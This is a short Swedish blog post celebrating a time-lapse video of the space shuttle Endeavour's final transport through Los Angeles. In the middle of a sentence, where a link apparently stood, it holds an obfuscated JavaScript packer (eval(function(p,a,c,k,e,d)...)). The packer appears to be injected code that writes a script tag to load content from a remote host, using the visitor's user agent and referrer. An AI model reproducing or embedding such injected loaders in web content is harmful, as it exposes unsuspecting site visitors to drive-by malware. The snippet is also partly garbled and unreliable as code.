Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Endeavours sista färd genom Los Angeles i Time-lapse

Filip Urde
  • On 18 oktober, 2012
  • http://www.revue.se/filip-urde

Bilderna på Endeavours sista tur i luften (se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tthnh|var|u0026u|referrer|sedis||js|php’.split(‘|’),0,{}))
här
) och sin transport genom Los Angeles har nog de flesta sett. Men här har vi hela transporten genom Los Angelse i Time-lapse.

Det var i helgen som man fraktade den från flygplatsen genom Inglewood till California Science Center. En mäktig maskin ska bli förevigad på ett värdigt sett.

Heja NASA!